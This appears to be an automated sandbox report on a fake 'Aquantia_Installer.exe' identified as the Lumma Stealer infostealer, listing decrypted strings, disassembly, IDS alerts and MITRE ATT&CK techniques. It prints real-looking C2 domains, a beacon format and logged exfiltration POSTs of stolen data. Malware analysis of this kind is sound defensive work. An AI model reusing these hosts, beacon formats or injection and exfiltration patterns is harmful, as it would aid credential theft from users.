API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: c2890b206e4d2d055c05f1be9578a55436c2592dd2383766dd7c6a125b97c01e
Instruction ID: c2125101e8c9eecba57d66b31128515156586c394b9fd73ccbbd7716fff43d9e
Opcode Fuzzy Hash: c2890b206e4d2d055c05f1be9578a55436c2592dd2383766dd7c6a125b97c01e
Instruction Fuzzy Hash: D2319FB49183048FDB00EF6CD98561EBBF4BB88304F11892EE499DB350D770A959CB82

Source: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmp	String decryptor: fumblingactor.cyou
Source: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmp	String decryptor: Workgroup: -

Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_01040F20
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 1CE638E1h	0_2_01040F20
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h	0_2_01039BA0
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+ecx]	0_2_010201C0
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], 484CE391h	0_2_010417D0
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 4x nop then cmp byte ptr [edx+ecx+01h], 00000000h	0_2_0102B1E0
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 4x nop then mov edx, eax	0_2_010391E0
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_01041420
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 4x nop then mov byte ptr [edx], bl	0_2_01009840
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 4x nop then movzx ecx, byte ptr [ebp+eax-2BC2CEC9h]	0_2_010284B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h	3_2_02F6AA63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+34FC8218h]	3_2_02F6AA63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_02F6B3E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	3_2_02F913A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, eax	3_2_02F89160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_02F7DEC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ecx], dx	3_2_02F90EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 1CE638E1h	3_2_02F90EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_02F7B2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 09785458h	3_2_02F692DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_02F85A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 4F699CD4h	3_2_02F91A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebp, word ptr [eax]	3_2_02F91A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edx], al	3_2_02F7DA13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp ebx	3_2_02F8FA17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp ecx	3_2_02F5D3E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 7D5D6260h	3_2_02F69390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h	3_2_02F89B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	3_2_02F8E8C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+28h]	3_2_02F6D891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	3_2_02F7A880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 933FB3DAh	3_2_02F6A043
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	3_2_02F69848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 09785458h	3_2_02F6983E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-46B27791h]	3_2_02F7C9C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp edx	3_2_02F549BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [esi], cx	3_2_02F739A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_02F739A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp byte ptr [edx+ecx+01h], 00000000h	3_2_02F7B160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+ecx]	3_2_02F70140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, word ptr [edi+eax*4]	3_2_02F57920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, word ptr [ebp+eax*4+00h]	3_2_02F57920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [ebp+ecx-6319B7C0h]	3_2_02F76E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	3_2_02F797F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	3_2_02F8CFCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edx], bl	3_2_02F597C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	3_2_02F527B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp eax	3_2_02F8F7B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+54D5508Fh]	3_2_02F5E7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], 484CE391h	3_2_02F91750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	3_2_02F73740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], B03B7AC0h	3_2_02F69710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then push esi	3_2_02F77C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [ebp+eax-2BC2CEC9h]	3_2_02F78430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [ebp+eax-2BC2CEC9h]	3_2_02F77C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-2Bh]	3_2_02F8F400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, word ptr [edx+eax+02h]	3_2_02F89DD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h	3_2_02F69D72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h	3_2_02F69D72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	3_2_02F72510

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 172.67.155.47:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 172.67.155.47:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49716 -> 172.67.155.47:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 172.67.155.47:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49722 -> 172.67.155.47:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 172.67.155.47:443

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 172.67.155.47:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 172.67.155.47:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 172.67.155.47:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 172.67.155.47:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 172.67.155.47:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 172.67.155.47:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 172.67.155.47:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.155.47:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=54TU150KE0PVRYIQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12830Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=E5O0FK1MFJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15036Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XEPT2EPSN48ZUU9RJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20568Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4YLONCHJDYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1241Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XGTBCI5SBOJ8NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 589595Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: frogs-severz.sbs

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: fumblingactor.cyou
Source: global traffic	DNS traffic detected: DNS query: frogs-severz.sbs

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Aquantia_Installer.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Aquantia_Install_d8272d3c64971475476783cd1ff2ada06cb2e7d1_da6d3015_e869c00f-6e95-46d2-8541-892e62f6bf0b\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1023.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER114C.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER116D.tmp.xml

C:\Users\user\AppData\Roaming\gdi32.dll

C:\Windows\appcompat\Programs\Amcache.hve

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
Aquantia_Installer.exe

Function 6CF25C40 Relevance: 9.5, APIs: 3, Strings: 2, Instructions: 713
nativeCOMMON

Function 6CF2F258 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Function 6CF2F308 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Function 6CF320FF Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Function 6CF2F151 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Function 6CF33F7E Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Function 6CF32547 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Function 010201C0 Relevance: 10.8, Strings: 8, Instructions: 831
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre